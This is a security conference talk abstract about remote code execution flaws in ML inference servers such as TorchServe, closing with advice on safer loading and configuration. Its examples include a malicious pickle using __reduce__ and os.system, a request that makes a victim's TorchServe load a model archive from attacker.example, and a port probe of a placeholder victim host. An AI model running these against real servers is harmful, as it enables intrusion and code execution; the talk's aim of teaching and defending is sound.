Hackfest 2024 - 16-bit Edition


Inference Servers: new technology, same old security flaws.
10-12, 14:30–15:20 (America/New_York), Track 2 (206a)
Language: English

AI- and LLM-based applications are taking the industry by storm. While a lot of time is spent on evaluating prompt injection, there is an entire ecosystem of applications that allow models to be run and used. These applications have their own security considerations that you should be aware of.

Inference Servers are used to host machine learning models and expose APIs that allow other components to perform inference on those models. These servers often expose additional APIs that allow users to load new models into them, which can be abused to perform remote code execution. While this technology is new, the baseline security configurations for many of these products are a relic from the past.

In this talk I will explain what an inference server is, how these servers work, and how you can achieve remote code execution on them. The talk is focused on the practical security risks involved in this ecosystem. I will also share the details of a couple of CVEs related to TorchServe.


Introduction:

● An overview of what Machine Learning (ML) models are, conceptually

● Reasons why a company would integrate an ML model

○ How the concept of ML models and their uses compares to using a Large Language Model (LLM) via OpenAI

● A discussion on how you should approach ML models as a security professional

○ ML models are, in a lot of ways, conceptually similar to binary files that are executed with an interpreter (e.g. PyTorch, TensorFlow).

In the introduction section I will provide an overview of what a machine learning model is. Rather than explaining from the perspective of a math PhD (as is often the case with ML articles), I will explain from the perspective of a security professional who is evaluating one of these models.

ML models have a vast array of uses. They can be very complex, generating arbitrary text as is the case with LLMs. Alternatively, ML models can be very simple and perform a trivial evaluation of a graph. Regardless of complexity, any ML model is essentially a binary file which is executed by an ML framework such as PyTorch or TensorFlow. The models are loaded by the framework and then provided with input to perform “inference” on and obtain a prediction.
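To make the "binary file plus interpreter" framing concrete, the following is a minimal sketch of the load-then-infer pattern (illustrative only; the tiny architecture and input values are made up):

    # Minimal sketch of the load-then-infer pattern described above.
    # The architecture and input values are made up for illustration.
    import torch
    import torch.nn as nn

    # A trivial model: two inputs in, one prediction out. In practice the
    # weights would come from a file on disk rather than fresh initialization.
    model = nn.Sequential(nn.Linear(2, 8), nn.ReLU(), nn.Linear(8, 1))
    model.eval()

    # "Inference" is simply: hand the model some input, get a prediction back.
    with torch.no_grad():
        prediction = model(torch.tensor([[0.5, 1.2]]))
    print(prediction)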

How are models used?:

• Users can train their own models, but it is more common to obtain a pre-trained model from a source like HuggingFace due to the intensive resource cost of training a model.

• Once users identify what models they want to use, they download the model files and then load them. Lack of validation on models from untrusted sources is a major contributor to supply chain risk.

• Models can be loaded directly via the framework that created them (e.g. in the case of PyTorch, using torch.load()) or by using a library like Transformers from HuggingFace (which uses the same backend framework itself); see the sketch after this list.

• Once a model has been loaded it can be used to perform inference; inference is the act of sending data to the model and obtaining a prediction back.
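The following is a rough sketch of the two loading paths described above (the file path and model name are placeholders/examples, and the Transformers path assumes network access to download the model):

    # Sketch of the two common loading paths. The .pt path is a placeholder.
    import torch
    from transformers import AutoModelForSequenceClassification, AutoTokenizer

    # Path 1: load a serialized PyTorch model directly with the framework.
    # By default this deserializes a Python Pickle (see "Dangerous File Formats").
    model = torch.load("downloaded_model.pt")
    model.eval()

    # Path 2: load a pre-trained model through HuggingFace Transformers,
    # which drives the same backend framework underneath.
    tok = AutoTokenizer.from_pretrained("distilbert-base-uncased")
    hf_model = AutoModelForSequenceClassification.from_pretrained("distilbert-base-uncased")

    # Inference: send data to the model, get a prediction back.
    inputs = tok("inference servers are fun", return_tensors="pt")
    with torch.no_grad():
        print(hf_model(**inputs).logits)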

Dangerous File Formats:

There are two types of commonly used model files, PyTorch models and TensorFlow H5 files, that are stored in dangerous file formats. PyTorch is the most common ML model library, and the file format it uses by default is insecure because it is a Python Pickle.

Pickle files are serialized objects that are deserialized with functions such as “torch.load()”. If code is injected into the Pickle file, the deserialization process will cause that code to execute. The remote code execution risk here is very straightforward: if a user attempts to load a malicious Python Pickle with “torch.load()”, the injected code will execute.
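As a rough illustration of why the format is dangerous (a deliberately harmless sketch; a real payload would run arbitrary attacker-chosen commands), a Pickle can be constructed whose deserialization executes code via __reduce__:

    # Sketch: a Pickle whose deserialization runs attacker-chosen code.
    # The payload is deliberately harmless (it just runs "id").
    import os
    import pickle

    class MaliciousPayload:
        def __reduce__(self):
            # Whatever this returns gets called during unpickling.
            return (os.system, ("id",))

    blob = pickle.dumps(MaliciousPayload())

    # The "victim" side: simply deserializing the blob executes the command.
    # torch.load() on an untrusted .pt file hits this same code path.
    pickle.loads(blob)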

I will demonstrate how this execution happens in the context of an inference server in the following sections.

Inference Servers:

An inference server is software that an organization uses to host models and expose them for inference. While it is possible to load a model locally, it is not efficient to do so if a given model has multiple consumers. One parallel to draw is with server software like Apache Tomcat: one Tomcat server exposes backend APIs that may be used by multiple frontend hosts.

Inference servers are all relatively new. Two of the biggest ones are Triton by Nvidia (https://developer.nvidia.com/triton-inference-server) and TorchServe by PyTorch (https://github.com/pytorch/serve).

Despite being new technology, some of these servers have a lot of insecure baseline configurations which are reminiscent of an earlier era of security.

Authentication:

● By default, most inference servers do not support authentication on any APIs.

○ Recent changes have implemented authentication, but often as an optional parameter.

● In many cases, developers may choose not to implement authentication as it creates a performance overhead.

Code Execution:

● Inference servers expose APIs that not only allow users to perform inference, but also to load new models (see the sketch after this list).

● In the context of these servers, loading a new model is in effect code execution.

● If a provided model file contains a model type that can execute code (such as a PyTorch model), the server will execute it when loading the model for inference.

● It is also possible to provide a handler file to these servers; handlers are generally used for tasks like tokenization, can be raw Python files, and can therefore also be used for code execution.
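As a rough sketch of how "loading a new model is code execution" plays out (the host and archive URL below are placeholders; it assumes TorchServe's documented management API, which listens on port 8081 by default), registering an attacker-controlled model archive can be a single unauthenticated HTTP request:

    # Sketch: registering an attacker-supplied model archive on an exposed
    # TorchServe management API (default port 8081). Host and archive URL
    # are placeholders; the .mar would contain a malicious model or handler.
    import requests

    TARGET = "http://victim.example:8081"

    # Ask the server to fetch and load a model archive. Loading the model
    # (or running its handler) is what executes the attacker's code.
    resp = requests.post(
        f"{TARGET}/models",
        params={
            "url": "http://attacker.example/payload.mar",
            "initial_workers": "1",
        },
    )
    print(resp.status_code, resp.text)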

Port Exposure:

● Inference servers expose multiple ports by default, usually API interfaces for both HTTP and gRPC.

● In some cases, exposed ports are not bound to localhost by default.
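As a quick illustration (the target host is a placeholder, and the port list reflects commonly documented defaults for TorchServe and Triton), checking which of these ports a host exposes takes only a few lines:

    # Sketch: probe a host for commonly used default inference-server ports.
    # Host is a placeholder; ports are commonly documented defaults for
    # TorchServe (8080/8081/8082 HTTP, 7070/7071 gRPC) and Triton (8000-8002).
    import socket

    HOST = "victim.example"
    PORTS = [8080, 8081, 8082, 7070, 7071, 8000, 8001, 8002]

    for port in PORTS:
        try:
            with socket.create_connection((HOST, port), timeout=2):
                print(f"{HOST}:{port} is reachable")
        except OSError:
            pass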

TorchServe:

TorchServe is one of the major inference servers on the market. During our research, we came across two issues, which we will discuss here.

• CVE-2024-35199 – By default, TorchServe exposed its gRPC ports on 0.0.0.0, which allowed a remote user to submit a model (which, in turn, is code execution).

• CVE-2024-35198 – TorchServe has a security control that limits the filesystem locations from which model files can be loaded; this CVE covers a bypass of that control.

We will also walk through examples of a few different ways you could exploit an exposed TorchServe server to obtain code execution.

Depending on timing, we can also discuss how TorchServe workers operate and how an attacker with local code execution on the system (e.g. obtained via a malicious Pickle) can try to target them.

Security Controls for Inference Servers:

● We will discuss some settings and options you can set to enable authentication and prevent arbitrary loading of models.

● We will also discuss how to safely load models with safer file formats or more restrictive loading options (see the sketch after this list).
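As a short sketch of the "safer file formats / more restrictive loading" point (file names are placeholders; it assumes the weights_only option of torch.load and the safetensors library):

    # Sketch: two common ways to avoid executing arbitrary Pickle payloads
    # when loading model weights. File names are placeholders.
    import torch
    from safetensors.torch import load_file

    # Option 1: restrict torch.load() so it only deserializes tensors/weights
    # instead of arbitrary pickled objects.
    state_dict = torch.load("model_weights.pt", weights_only=True)

    # Option 2: use the safetensors format, which stores raw tensors and
    # cannot carry executable payloads.
    state_dict = load_file("model.safetensors")

    # Either way, the weights are then applied to a model class that you
    # define and trust, rather than reconstructing arbitrary objects from disk.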

For the conclusion, I will discuss which security controls and configuration options to look for, or recommend, when reviewing the security configuration of an inference server.


Are you releasing a tool? – no

My name is Pratik Amin and I have been working in Application Security for about 15 years now. I am a Principal Security Consultant at Kroll (previously Security Compass). I've spent a lot of that time doing AppSec pentests and digging into interesting technology.